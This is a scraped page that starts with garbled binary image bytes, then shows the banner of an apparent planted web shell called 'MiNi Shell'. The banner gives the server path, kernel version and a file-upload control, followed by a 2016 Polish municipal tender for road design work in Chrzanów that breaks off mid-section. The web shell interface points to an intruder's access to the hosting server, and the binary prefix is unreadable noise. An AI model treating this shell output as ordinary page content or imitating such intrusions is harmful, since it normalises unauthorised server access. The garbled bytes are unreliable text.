JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160323/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160323/65824-N-2016.html

<p class="kh_header"><b>Chrzanów: Zadanie 1.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Budowa odcinka drogi ul. Grottgera i ul. Gierymskiego w Chrzanowie, Zadanie 2.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Rozbudowa przebudowa drogi gminnej ul. Zielonej od ul. Kusocińskiego do skrzyżowania z ul. Grzybową wraz z przyległym do niej chodnikiem oraz budową parkingów i ścieżki rowerowej, Zadanie 3.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Budowa dróg na os. Chechło-Południe w Chrzanowie-ul. Leszczynowa, ul. Brzoskwiniowa</b><br>
<b>Numer ogłoszenia: 65824 - 2016; data zamieszczenia: 23.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Chrzanowa , al. Henryka 20, 32-500 Chrzanów, woj. małopolskie, tel. 032 7585101, faks (032) 623 37 86.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Budowa odcinka drogi ul. Grottgera i ul. Gierymskiego w Chrzanowie, Zadanie 2.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Rozbudowa przebudowa drogi gminnej ul. Zielonej od ul. Kusocińskiego do skrzyżowania z ul. Grzybową wraz z przyległym do niej chodnikiem oraz budową parkingów i ścieżki rowerowej, Zadanie 3.	Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Budowa dróg na os. Chechło-Południe w Chrzanowie-ul. Leszczynowa, ul. Brzoskwiniowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na opracowaniu dokumentacji projektowo - kosztorysowej wraz z uzyskaniem w imieniu Zamawiającego ostatecznej decyzji: 
1) o pozwoleniu na budowę dla zadania 1: Wykonanie dokumentacji projektowo -kosztorysowej dla zadania pn.: Budowa odcinka drogi ul. Grottgera i ul. Gierymskiego w Chrzanowie,
2) o zezwoleniu na realizację inwestycji drogowej dla zadania 2: Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Rozbudowa przebudowa drogi gminnej ul. Zielonej od ul. Kusocińskiego do skrzyżowania z ul. Grzybową wraz z przyległym do niej chodnikiem oraz budową parkingów i ścieżki rowerowej,
3) o pozwoleniu na budowę dla zadania 3: Wykonanie dokumentacji projektowo -kosztorysowej dla zadania pn.: Budowa dróg na os. Chechło-Południe w Chrzanowie-ul. Leszczynowa, ul. Brzoskwiniowa.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą wykazać spełnianie powyższego warunku poprzez realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch usług polegających na opracowaniu projektu budowy, przebudowy lub rozbudowy drogi klasy co najmniej L i długości co najmniej:
- dla zadania 1 - 200 m każda,
- dla zadania 2 - 400 m każda,
- dla zadania 3 - 200 m każda.
W przypadku składania oferty na zadanie 1 oraz zadanie 3 Wykonawca musi wykazać się wykonaniem co najmniej dwóch usług polegających na opracowaniu projektu budowy, przebudowy lub rozbudowy drogi klasy co najmniej L i długości co najmniej 200 m każda. 
W przypadku składania oferty na zadanie 2 oraz zadanie 1 i/lub 3 Wykonawca musi wykazać się wykonaniem co najmniej dwóch usług polegających na opracowaniu projektu budowy, przebudowy lub rozbudowy drogi klasy co najmniej L i długości co najmniej 400 m każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą wykazać spełnianie powyższego warunku poprzez dysponowanie co najmniej następującymi osobami: 
- projektant branży drogowej (1 osoba), który winien posiadać uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej lub uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - upoważniające do projektowania w specjalności drogowej oraz aktualny wpis do samorządu zawodowego. W przypadku składania oferty na więcej niż jedno zadanie Wykonawca musi wykazać się dysponowaniem co najmniej 1 osobą, która będzie pełniła funkcję projektanta branży drogowej w ramach każdego zadania oddzielnie (np. w przypadku składania oferty na 3 zadania Wykonawca musi dysponować 3 osobami, które będą pełniły funkcję projektanta branży drogowej);
- projektant branży instalacyjnej (1 osoba), który winien posiadać uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń lub uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - upoważniające do projektowania w zakresie co najmniej sieci wodociągowych i kanalizacyjnych oraz aktualny wpis do samorządu zawodowego. W przypadku składania oferty na więcej niż jedno zadanie wystarczy, że Wykonawca wykaże się dysponowaniem co najmniej 1 osobą, która będzie pełniła funkcję projektanta branży instalacyjnej;
-	projektant branży elektrycznej (1 osoba), który winien posiadać uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - upoważniające do projektowania w zakresie co najmniej sieci i instalacji elektrycznych oraz aktualny wpis do samorządu zawodowego. W przypadku składania oferty na więcej niż jedno zadanie wystarczy, że Wykonawca wykaże się dysponowaniem co najmniej 1 osobą, która będzie pełniła funkcję projektanta branży elektrycznej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć również następujące dokumenty:
1. Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów załączonych do oferty. Pełnomocnictwo wymagane jest również w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie.
2. Wypełniony formularz oferty (załącznik nr 1 i/lub 2 i/lub 3 do SIWZ). Formularz oferty należy złożyć dla każdego zadania oddzielnie.
3. Oświadczenie stwierdzające, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-4 i nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy (załącznik nr 4 do SIWZ). W przypadku, gdy ofertę składają podmioty działające wspólnie, oświadczenie w imieniu wszystkich podmiotów składa ustanowiony pełnomocnik. Dopuszcza się również, by oświadczenie na jednym formularzu złożyły wszystkie występujące wspólnie podmioty.
4. Pisemne zobowiązanie podmiotu udostepniającego osoby zdolne do wykonania zamówienia lub potencjał techniczny - tylko w przypadku kiedy Wykonawca będzie polegał na zasobach innych podmiotów zgodnie z art. 26 ust 2b ustawy Pzp (załącznik 7 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany treści zawartej umowy dotyczącej:
1) ceny, 
a) w przypadku zmiany albo wprowadzenia nowych przepisów lub norm jeśli zgodnie 
z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 
w tym zwłaszcza w zakresie stawki podatku VAT;
2) podwykonawcy,
a) wskutek utraty zdolności podwykonawcy do uczestnictwa w realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chrzanow.pl (zakładka: zamówienia publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chrzanowie, Aleja Henryka 20, 32-500 Chrzanów, pok. nr 85 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2016 godzina 11:00, miejsce: Urząd Miejski w Chrzanowie, Aleja Henryka 20, 32-500 Chrzanów, Dziennik podawczy (pok. nr 1, parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Wykonanie dokumentacji projektowo -kosztorysowej dla zadania pn.: Budowa odcinka drogi ul. Grottgera i ul. Gierymskiego w Chrzanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres opracowania:
a)	ul. Grottgera:
-	budowa ulicy Grottgera (droga gminna klasy L) od ulicy Fałata do ulicy Gierymskiego na długości ok. 312 m (lokalizacja na zał. graficznym) 
-	jezdnia 2 pasy ruchu po 2,5 m razem 5,0 m;
-	konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-2;
-	obustronne pobocze utwardzane;
-	obustronne okrawężnikowanie;
-	wjazdy do posesji z kostki betonowej; 
-	oświetlenie;
-	odwodnienie.
b)	 ul. Gierymskiego:
-	budowa odcinka ulicy Gierymskiego od ulicy Fałata do ulicy Fałata (drogi gminna klasy L) na długości ok. 180 m (lokalizacja na zał. graficznym); 
-	jezdnia 2 pasy ruchu po 3,0 m razem 6,0 m;
-	konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-2;
-	obustronne pobocze utwardzane;
-	obustronne okrawężnikowanie;
-	wjazdy do posesji z kostki betonowej; 
-	oświetlenie;
-	odwodnienie.

Obowiązki Wykonawcy:
1)	opracowanie mapy do celów projektowych, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2015 poz. 520),
2)	uzyskanie wypisów i wyrysów z ewidencji gruntów,
3)	przygotowanie geotechnicznych warunków posadawiania opracowanych zgodnie z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 poz. 463) wraz z opinia hydrogeologiczną,
4)	opracowanie projektu budowlanego (5 egz.), zgodnie z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 poz. 462 z późn. zm.), Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2016 poz. 124), ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 
z 2016 poz. 290) wraz z uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2015, poz. 199),
5) opracowanie projektów wykonawczych dla niezbędnych branż wraz z projektem docelowej organizacji ruchu (4 egz.),
6) opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych (4 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.),
7) opracowanie kosztorysu inwestorskiego i przedmiaru robót (2 egz.), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 poz. 1129 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego; obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 nr 130 poz. 1389 z późn. zm.)
8) uzyskanie w imieniu Zamawiającego ostatecznej decyzji o pozwoleniu na budowę, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2016 poz. 290).
Zamawiający winien również otrzymać opracowania wymienione w pkt. 1, 3-7 w wersji elektronicznej na płycie CD.
Wykonawca winien uwzględnić przy opracowaniu przedmiotu zamówienia: 
- załącznik nr 1a - załącznik graficzny z lokalizacją inwestycji.
Wykonawca przed wystąpieniem o wydanie decyzji o pozwoleniu na budowę uzyska pozytywną opinię Zamawiającego dla rozwiązań projektowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2: Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Rozbudowa przebudowa drogi gminnej ul. Zielonej od ul. Kusocińskiego do skrzyżowania z ul. Grzybową wraz z przyległym do niej chodnikiem oraz budową parkingów i ścieżki rowerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres opracowania:
- przebudowa (rozbudowa) drogi gminnej - ulicy Zielonej (droga klasy L) na długości ok. 450 m - zgodnie z załącznikiem graficznym (jezdnia 2 pasy ruchu po 3,5 m razem 7,0 m; konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-4) wraz z przebudową odwodnienia, przebudową chodnika od strony osiedla, budową chodnika i ścieżki rowerowej od strony PKP; zagospodarowaniem zielenią
- budowa ronda 3-wlotowego na skrzyżowaniu z ul. Kusocińskiego (konstrukcja nawierzchni dla kategorii obciążenia ruchem KR-5); 
- budowa miejsc postojowych wzdłuż ul. Zielonej od strony torów PKP z uwzględnieniem miejsc dla osób niepełnosprawnych;
- budowa miejsc postojowych z oświetleniem na działce nr 1156/310, 3998/113 z uwzględnieniem miejsc dla osób niepełnosprawnych, wjazdami od ul. Zielonej oraz od ul. Grzybowej
Obowiązki Wykonawcy:
1) opracowanie mapy do celów projektowych, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2015 poz. 520),
2) opracowanie dokumentacji geodezyjnej niezbędnej do uzyskania decyzji o zgodzie na realizację inwestycji drogowej - ilość działek do podziału wynikać będzie z opracowanej przez Wykonawcę dokumentacji.
